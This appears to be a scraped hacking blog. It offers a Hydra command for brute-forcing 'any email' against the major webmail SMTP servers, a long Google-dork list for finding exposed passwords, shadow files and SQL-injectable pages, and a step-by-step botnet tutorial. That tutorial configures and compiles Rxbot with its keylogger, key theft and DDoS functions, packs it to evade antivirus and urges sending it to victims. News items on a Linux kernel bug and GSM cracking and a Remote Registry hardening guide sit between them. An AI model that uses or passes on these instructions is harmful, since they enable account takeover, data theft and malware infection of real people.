Using Hydra to HACK any e-mail

Type hydra in kali terminal or in terminal in other linux operating systems whereever hydra is installed. After you enter hydra and click on enter, you can find information on how to use hydra. As per this post I will show you command to hack into any email.

hydra -l < mail address> -P -s < port > -S -v -V -t < number of tasks> < mailer server > smtp

Below are port numbers and server links.

Yahoo
Server SMTP.mail.Yahoo.com
Port 465


Gmail
Server smtp.Gmail.com
Port 465


Hotmail
Server smtp. Live.com
Port 587

Read More

Advanced way of searching in GOOGLE

Operator	How to Use It	Examples
* (Asterisk)	Add the asterisk as a placeholder for an unknown word or fact	Find quotes that start with "Life is like": Life is like a *
" (Quotation marks)	Look for an exact word or phrase by putting it in quotes	Find pages that talk about the book One Hundred Years of Solitude: "One Hundred Years of Solitude"
- (Hyphen)	Use a hyphen before a word or site to exclude it from your search results	Omit Wikipedia pages from search results: -site:wikipedia.org. Narrow results to the band R.E.M., not rapid eye movement: R.E.M. -sleep
.. (Two Periods)	Separate numbers with two periods without spaces to search for numbers within that range	Find phones that cost between $200 and $400: Android phone $200..$400. Find computer milestones that took place between 1950 and 2000: "computer milestones" 1950..2000
allintitle:	Use allintext:[search phrase] to find pages with all of those words in the title of the page	Show pages that have both "Apple" and "notebook" in the title: allintitle:Apple notebook
allintext:	Use allintext:[search phrase] to find pages with all of those words in the body of the page	Show pages that mention Roth, IRA, and investments in the body: allintext:Roth IRA investments
allinurl:	Use allinurl:[search phrase] to find pages with all of those words in the URL	Show pages that have both "Microsoft" and "Surface" in the URL: allinurl:Microsoft Surface
AROUND(n)	Add AROUND(n) between two search terms to find pages where those terms are written on the page in close proximity. The number you choose in place of n sets the maximum distance between the terms. This is useful for finding relationships between two search terms.	Find pages that mention Facebook and Microsoft in the same sentence or paragraph: Facebook AROUND(7) Microsoft
site:	Use site:[URL] to limit search results to a specific website	Find pages on Zapier that mention trello: site:zapier.com Trello
related:	Use related:[URL] to find sites similar to a specific website	Find websites similar to Zapier: related:zapier.com
filetype:	Use filetype:[suffix] to limit results to a certain file format, such as PDF or DOC.	Find keyboard shortcuts for Microsoft Office that are shared as PDF: filetype:pdf office keyboard shortcuts
intitle:	Use intitle:[search phrase] to search for pages that have at least one of your search words in the title	Show pages that have "Apple" or "notebook" or both in the title: intitle:Apple notebook
intext:	Use intext:[search phrase] to search for pages that have at least one of your search words in the body of the page	Show pages that mention Roth, IRA, and/or investments in the body: intext:Roth IRA investments
inurl:	Use inurl:[search phrase] to search for pages that have at least one of your search words in the URL	Show pages that mention Roth, IRA, and/or investments in the body: intext:Roth IRA investments
OR	Perform two search queries at the same time by separating your search terms with OR. This will find pages that might one of several words.	Search for pages that reference "Google Drive," "Dropbox," or "OneDrive": "Google Drive" OR Dropbox OR OneDrive

For example if we want to search some txt file or pdf in a website or relevant, we will type in google as

Within website with extension: inurl:"websitename.com" filetype:txt 

Relavent info with extension: intext:"passlist" filetype:txt

Read More

Listing of a number of useful Google dorks

Explanations:

cache: If you include other words in the query, Google will highlight those words within

 the cached document. For instance, [cache:www.google.com web] will show the cached

 content with the word “web” highlighted. This functionality is also accessible by

 clicking on the “Cached” link on Google’s main results page. The query [cache:] will

 show the version of the web page that Google has in its cache. For instance,

 [cache:www.google.com] will show Google’s cache of the Google homepage. Note there

 can be no space between the “cache:” and the web page url.

------------------------------------------------------------------------------------------

link: The query [link:] will list webpages that have links to the specified webpage.

 For instance, [link:www.google.com] will list webpages that have links pointing to the

 Google homepage. Note there can be no space between the “link:” and the web page url.

------------------------------------------------------------------------------------------

related: The query [related:] will list web pages that are “similar” to a specified web

 page. For instance, [related:www.google.com] will list web pages that are similar to

 the Google homepage. Note there can be no space between the “related:” and the web

 page url.

------------------------------------------------------------------------------------------

info: The query [info:] will present some information that Google has about that web

 page. For instance, [info:www.google.com] will show information about the Google

 homepage. Note there can be no space between the “info:” and the web page url.

------------------------------------------------------------------------------------------

define: The query [define:] will provide a definition of the words you enter after it,

 gathered from various online sources. The definition will be for the entire phrase

 entered (i.e., it will include all the words in the exact order you typed them).

------------------------------------------------------------------------------------------

stocks: If you begin a query with the [stocks:] operator, Google will treat the rest

 of the query terms as stock ticker symbols, and will link to a page showing stock

 information for those symbols. For instance, [stocks: intc yhoo] will show information

 about Intel and Yahoo. (Note you must type the ticker symbols, not the company name.)

------------------------------------------------------------------------------------------

site: If you include [site:] in your query, Google will restrict the results to those

 websites in the given domain. For instance, [help site:www.google.com] will find pages

 about help within www.google.com. [help site:com] will find pages about help within

 .com urls. Note there can be no space between the “site:” and the domain.

------------------------------------------------------------------------------------------

allintitle: If you start a query with [allintitle:], Google will restrict the results

 to those with all of the query words in the title. For instance,

 [allintitle: google search] will return only documents that have both “google”

 and “search” in the title.

------------------------------------------------------------------------------------------

intitle: If you include [intitle:] in your query, Google will restrict the results

 to documents containing that word in the title. For instance, [intitle:google search]

 will return documents that mention the word “google” in their title, and mention the

 word “search” anywhere in the document (title or no). Note there can be no space

 between the “intitle:” and the following word. Putting [intitle:] in front of every

 word in your query is equivalent to putting [allintitle:] at the front of your

 query: [intitle:google intitle:search] is the same as [allintitle: google search].

------------------------------------------------------------------------------------------

allinurl: If you start a query with [allinurl:], Google will restrict the results to

 those with all of the query words in the url. For instance, [allinurl: google search]

 will return only documents that have both “google” and “search” in the url. Note

 that [allinurl:] works on words, not url components. In particular, it ignores

 punctuation. Thus, [allinurl: foo/bar] will restrict the results to page with the

 words “foo” and “bar” in the url, but won’t require that they be separated by a

 slash within that url, that they be adjacent, or that they be in that particular

 word order. There is currently no way to enforce these constraints.

------------------------------------------------------------------------------------------

inurl: If you include [inurl:] in your query, Google will restrict the results to

 documents containing that word in the url. For instance, [inurl:google search] will

 return documents that mention the word “google” in their url, and mention the word

 “search” anywhere in the document (url or no). Note there can be no space between

 the “inurl:” and the following word. Putting “inurl:” in front of every word in your

 query is equivalent to putting “allinurl:” at the front of your query:

 [inurl:google inurl:search] is the same as [allinurl: google search].

------------------------------------------------------------------------------------------

Nina Simone intitle:”index.of” “parent directory” “size” “last modified” “description” I Put A Spell On You (mp4|mp3|avi|flac|aac|ape|ogg) -inurl:(jsp|php|html|aspx|htm|cf|shtml|lyrics-realm|mp3-collection) -site:.info

Bill Gates intitle:”index.of” “parent directory” “size” “last modified” “description” Microsoft (pdf|txt|epub|doc|docx) -inurl:(jsp|php|html|aspx|htm|cf|shtml|ebooks|ebook) -site:.info

parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

parent directory Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

parent directory Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

filetype:config inurl:web.config inurl:ftp

“Windows XP Professional” 94FBR

ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential

ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential

ext:inc "pwd=" "UID="

ext:ini intext:env.ini

ext:ini Version=... password

ext:ini Version=4.0.0.4 password

ext:ini eudora.ini

ext:ini intext:env.ini

ext:log "Software: Microsoft Internet Information Services *.*"

ext:log "Software: Microsoft Internet Information

ext:log "Software: Microsoft Internet Information Services *.*"

ext:log \"Software: Microsoft Internet Information Services *.*\"

ext:mdb   inurl:*.mdb inurl:fpdb shop.mdb

ext:mdb inurl:*.mdb inurl:fpdb shop.mdb

ext:mdb inurl:*.mdb inurl:fpdb shop.mdb

filetype:SWF SWF

filetype:TXT TXT

filetype:XLS XLS

filetype:asp   DBQ=" * Server.MapPath("*.mdb")

filetype:asp "Custom Error Message" Category Source

filetype:asp + "[ODBC SQL"

filetype:asp DBQ=" * Server.MapPath("*.mdb")

filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\") 

filetype:asp “Custom Error Message” Category Source

filetype:bak createobject sa

filetype:bak inurl:"htaccess|passwd|shadow|htusers"

filetype:bak inurl:\"htaccess|passwd|shadow|htusers\" 

filetype:conf inurl:firewall -intitle:cvs 

filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals

filetype:dat "password.dat

filetype:dat \"password.dat\" 

filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"

filetype:eml eml +intext:\"Subject\" +intext:\"From\" +intext:\"To\" 

filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”

filetype:inc dbconn 

filetype:inc intext:mysql_connect

filetype:inc mysql_connect OR mysql_pconnect 

filetype:log inurl:"password.log"

filetype:log username putty PUTTY SSH client logs can reveal usernames

filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”

filetype:mdb inurl:users.mdb

filetype:ora ora

filetype:ora tnsnames

filetype:pass pass intext:userid

filetype:pdf "Assessment Report" nessus

filetype:pem intext:private

filetype:properties inurl:db intext:password

filetype:pst inurl:"outlook.pst"

filetype:pst pst -from -to -date

filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"

filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\" 

filetype:reg reg +intext:â? WINVNC3â?

filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”

filetype:reg reg HKEY_ Windows Registry exports can reveal

filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS

filetype:sql "insert into" (pass|passwd|password)

filetype:sql ("values * MD5" | "values * password" | "values * encrypt")

filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" ) 

filetype:sql (\"values * MD\" | \"values * password\" | \"values * encrypt\") 

filetype:sql +"IDENTIFIED BY" -cvs

filetype:sql password

filetype:sql password 

filetype:sql “insert into” (pass|passwd|password)

filetype:url +inurl:"ftp://" +inurl:";@"

filetype:url +inurl:\"ftp://\" +inurl:\";@\" 

filetype:url +inurl:”ftp://” +inurl:”;@”

filetype:xls inurl:"email.xls"

filetype:xls username password email

index of: intext:Gallery in Configuration mode

index.of passlist

index.of perform.ini mIRC IRC ini file can list IRC usernames and

index.of.dcim 

index.of.password 

intext:" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

intext:"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd

intext:"#mysql dump" filetype:sql

intext:"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3

intext:"A syntax error has occurred" filetype:ihtml

intext:"ASP.NET_SessionId" "data source="

intext:"About Mac OS Personal Web Sharing"

intext:"An illegal character has been found in the statement" -"previous message"

intext:"AutoCreate=TRUE password=*"

intext:"Can't connect to local" intitle:warning

intext:"Certificate Practice Statement" filetype:PDF | DOC

intext:"Certificate Practice Statement" inurl:(PDF | DOC)

intext:"Copyright (c) Tektronix, Inc." "printer status"

intext:"Copyright © Tektronix, Inc." "printer status"

intext:"Emergisoft web applications are a part of our"

intext:"Error Diagnostic Information" intitle:"Error Occurred While"

intext:"Error Message : Error loading required libraries."

intext:"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-

intext:"Fatal error: Call to undefined function" -reply -the -next

intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu

intext:"Generated   by phpSystem"

intext:"Generated by phpSystem"

intext:"Host Vulnerability Summary Report"

intext:"HostingAccelerator" intitle:"login" +"Username" -"news" -demo

intext:"IMail Server Web Messaging" intitle:login

intext:"Incorrect syntax near"

intext:"Index of" /"chat/logs"

intext:"Index of /network" "last modified"

intext:"Index of /" +.htaccess

intext:"Index of /" +passwd

intext:"Index of /" +password.txt

intext:"Index of /admin"

intext:"Index of /backup"

intext:"Index of /mail"

intext:"Index of /password"

intext:"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log

intext:"Microsoft CRM : Unsupported Browser Version"

intext:"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log

intext:"Network Host Assessment Report" "Internet Scanner"

intext:"Network Vulnerability   Assessment Report"

intext:"Network Vulnerability Assessment Report"

intext:"Network Vulnerability Assessment Report" 本文来自 pc007.com

intext:"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"

intext:"Thank you for your order"   +receipt

intext:"Thank you for your order" +receipt

intext:"Thank you for your purchase" +download

intext:"The following report contains confidential information" vulnerability -search

intext:"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"

intext:"phpMyAdmin MySQL-Dump" filetype:txt

intext:"phpMyAdmin" "running on" inurl:"main.php"

intextpassword | passcode)   intextusername | userid | user) filetype:csv

intextpassword | passcode) intextusername | userid | user) filetype:csv

intitle:"index of" +myd size

intitle:"index of" etc/shadow

intitle:"index of" htpasswd

intitle:"index of" intext:connect.inc

intitle:"index of" intext:globals.inc

intitle:"index of" master.passwd

intitle:"index of" master.passwd 007电脑资讯

intitle:"index of" members OR accounts

intitle:"index of" mysql.conf OR mysql_config

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" spwd

intitle:"index of" user_carts OR user_cart

intitle:"index.of *" admin news.asp configview.asp

intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com

intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com

inurl:admin inurl:userlist Generic userlist files

------------------------------------------------------------------------------------------

Using special search string to find vulnerable websites:

inurl:php?=id1

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num= andinurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

Read More

Dangerious Linux Kernel Vulnerability For ALL 2.4 & 2.6 Kernels

This is a serious bug, it effects all Kernel versions released since May 2001! That goes all the way back to the early 2.4 versions.
It’s also exploitable according to the report – This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel (which I would assume to be root).
At least it only allows local priveledge escalation, if was a remote root exploit in the kernel..it would be a disaster.
Imagine all the Linux boxes out there connected to the net where the admin doesn’t update or read security resources.

Linux developers have issued a critical update for the open-source OS after researchers uncovered a vulnerability in its kernel that puts most versions built in the past eight years at risk of complete takeover.
The bug involves the way kernel-level routines such as sock_sendpage react when they are left unimplemented. Instead of linking to a corresponding placeholder, (for example, sock_no_accept), the function pointer is left uninitialized. Sock_sendpage doesn’t always validate the pointer before dereferencing it, leaving the OS open to local privilege escalation that can completely compromise the underlying machine.
“Since it leads to the kernel executing code at NULL, the vulnerability is as trivial as it can get to exploit,” security researcher Julien Tinnes writes here. “An attacker can just put code in the first page that will get executed with kernel privileges.”

A patch has been released, so if you have untrusted local users on your system UPDATE YOUR KERNEL NOW!
This is the second time this year there has been a serious exploit in the Linux Kernel, which in a way is good because it means people are looking at it critically.
The more bugs that get exposed, the more secure the Kernel and our operating systems become.

Tinnes and fellow researcher Tavis Ormandy released proof-of-concept code that they said took just a few minutes to adapt from a previous exploit they had. They said all 2.4 and 2.6 version since May 2001 are affected.
Security researchers not involved in the discovery were still studying the advisory at time of writing, but at least one of them said it appeared at first blush to warrant an immediate action.
“This passes my it’s-not-crying-wolf test so far,” said Rodney Thayer, CTO of security research firm Secorix. “If I had some kind of enterprise-class Linux system like a Red Hat Enterprise Linux…I would really go check and see if this looked like it related, and if my vendor was on top of it and did I need to get a kernel patch.”

I wonder if any more major bugs will be disclosed before the end of the year? The less Kernel updates that need to be carried out the better in my books.
Full technical details of the bug can be found here:
Linux NULL pointer dereference due to incorrect proto_ops initializations

Read More

Cracking GSM phone crypto

If you are using a GSM phone (AT&T or T-Mobile in the U.S.), you likely have a few more months before it will be easy for practically anyone to spy on your communications.
Security researcher Karsten Nohl is launching an open-source, distributed computing project designed to crack the encryption used on GSM phones and compile it in to a code book that can be used to decode conversations and any data that gets sent to and from the phone.

Karsten Nohl talks about his distributed computing, open-source AE/1 cracking project at the Hacking at Random conference.

(Credit: Hacking at Random)

he hopes that by doing this it will spur cellular providers in to improving the security of their services and fix a weakness that has been around for 15 years and affects about 3 billion mobile users.
"We're not generating a vulnerability but publicizing a flaw that's already being exploited very widely," he said in a phone interview Monday.
"Clearly we are making the attack more practical and much cheaper, and of course there's a moral query of whether we should do that," he said. "But more importantly, we are informing (people) about a longstanding vulnerability and hopefully preventing more systems from adopting this."
This weakness in the encryption used on the phones, A5/1, has been known about for years. there's at least one commercial tools that permit for decrypting GSM communications that range in price from $100,000 to $250,000 depending on how fast you want the program to work, said Nohl, who previously has publicized weaknesses with wireless clever card chips used in transit systems.
It will take 80 high-performance computers about one months to do a brute force attack on A5/1 and generate a large look-up table that will serve as the code book, said Nohl, who announced the project at the Hacking at Random conference in the Netherlands 10 days ago.
Using the code book, anyone could get the encryption key for any GSM call, SMS message, or other communication encrypted with A5/1 and listen to the call or read the data in the clear. If 160 people donate their computing resources to the project, it should only take one and a half months to complete, he said.
Participants download the program and one months later we share the files created with others, by BitTorrent, for instance, Nohl said. "We have no connection to them," he added.
Once the look-up table is created it would be available for anyone to use.
Distributed computing, which has long been used for research and academic purposes, like SETI@home, and which companies have built businesses around, not only solves the technical hurdle to cracking the A5/1 code, but it could solve the legal ones .
A few years ago a similar GSM cracking project was embarked on but was halted before it was completed after researchers were intimidated, possibly by a cellular provider, Nohl said. By distributing the effort among participants and not having it centralized, the new effort will be less vulnerable to outside interference, he said.
Nohl wasn't certain of the legal ramifications of the project but said it's likely that using such a look-up table is illegal but possession is legal because of the companies that openly advertise their tables for sale.
A T-Mobile spokeswoman said the company had no comment on the matter.
AT&T spokesman Mark Siegel said, "We take strange care to protect the privacy of our customers and use a variety of tools, lots of technical and some human approaches. I can't go in to the details for security reasons." he declined to elaborate or comment further.
Taking precautions
Carriers should upgrade the encryption or move voice services to 3G, which has much stronger encryption, Nohl said.
In the meantime, people can use separate encryption products on the phone, like Cellcrypt, or handsets with their own encryption, Nohl said. Amnesty International and Greenpeace are using phones with stronger encryption, for example, but it only works if both parties to a conversation are using the same technology, he said.
For data encryption there is good Privacy (PGP) for e-mail and virtual private network (VPN) program for connecting to a corporate network, he said.
The encryption problem is serious for people doing online banking, where banks are using text messages as authentication tokens. Banks should instead offer RSA SecurID tokens or send one-time pass phrases through regular mail, Nohl said.
"I reckon, potentially, this could have as much impact as the breaking of WEP (Wired Equivalent Privacy) had a few years ago," said Stan Schatt, security practice director at ABI Research. "That shook up the industry a bit."
As a result of breaking that encryption, enterprises were reluctant to rely on wireless LANs so the Wi-Fi Alliance pushed through an interim standard that strengthened the encryption method, he said.
"Vendors will jump in with interim solutions, like Cellcrypt," Schatt said. "Mobile operators themselves will have to jump in and offer additional levels of encryption as part of a managed service offering for people who want a higher level of encryption."
However, consumers aren't likely to want to pay extra for the boosted encryption strength, he said.
To snoop on someone's phone, a would-be spy would want to be within eyesight of the target, Schatt said. Or, spies could point a recording device in the direction of a building and grab whatever conversations were nearby, he said.
"If you stand outside a building of a competitor you could get conversations between product managers and about sensitive corporation information, like acquisitions," he said. "Corporations put even more sensitive information over their phones, in general, than we do over their e-mail."
 The project web page is here and the the talk with slides is here.
 source:cnet.com

Read More

how to Disable the Remote Registry service in Windows

The "Remote Registry" service enables remote users to alter registry setting on your computer. By default, the "Startup type" setting for the "Remote Registry" service may be set to "Automatic” or "Manual" which is a security risk for a single user (or) laptop computer user.
So, to make sure that only users on your computer can alter the process registry disable this "Remote Registry" service.

Here is how it can be completed:

1. Click Start and pick Control Panel from the Start Menu items.Note:
If you find difficulty in accessing the Control Panel in your computer,
CLICK HERE To Know the Different Ways To Access the Windows Control Panel

2. If your Control Panel is showing items in Classic View, find the icon named Administrative Tools and double click on it.

Alternatively if you are under Category View, click Performance and Maintenance and then Click Administrative Tools

3. Now double-click on Services applet which is used to start, stop and configure windows services on your computer. This open the service window listing all the windows services.
4. From the right pane of the Services Window, find the service named Remote Registry

5. Double-click the "Remote Registry" service which shows the Remote Registry Properties for your Local computer.

Now, press the Stop button first to stop the started service and then pick Disabled from the drop down menu under 'Startup Type' and click Apply->OK.

6.Close the "Services" window and restart your computer for the changes to take effect.

That's it!! you have disabled the "Remote Registry" service on your computer to prevent unauthorized changes to the process registry.

Read More

How To Create And Compile Botnets To Autohack 1000ds of Systems

 i found a nice tut that helps u with the basics of the botnets

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen 
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:

Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Quote:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Read More